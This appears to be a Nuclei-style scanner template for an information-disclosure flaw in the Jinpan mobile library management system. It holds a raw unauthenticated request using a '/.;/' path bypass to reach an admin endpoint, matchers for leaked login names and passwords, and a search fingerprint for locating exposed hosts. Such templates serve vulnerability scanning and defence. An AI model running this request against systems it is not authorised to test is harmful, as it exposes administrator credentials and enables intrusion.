http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 登录名
            - 登录密码
            - 昵称
            - 最后访问IP
            - 最后访问时间
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /.;/admin/auth/member/1/tabShow HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
id: jinpanyidong-tabShow-Information-disclosure
info:
    author: Superhero
    description: |-
        Hunter: icon_hash="89337953"
        金盘移动图书馆图书管理系统 tabShow 存在信息泄露漏洞，未经身份验证的远程攻击者可利用此漏洞获取后台账号密码等敏感信息，从而登录后台，使系统处于极不安全的状态。
    name: 金盘移动图书馆图书管理系统 tabShow 信息泄露漏洞
    reference:
        - https://mp.weixin.qq.com/s/buG96lPHVaK6wuQTO1oNEg
    severity: medium
    tags:
        - Information disclosure
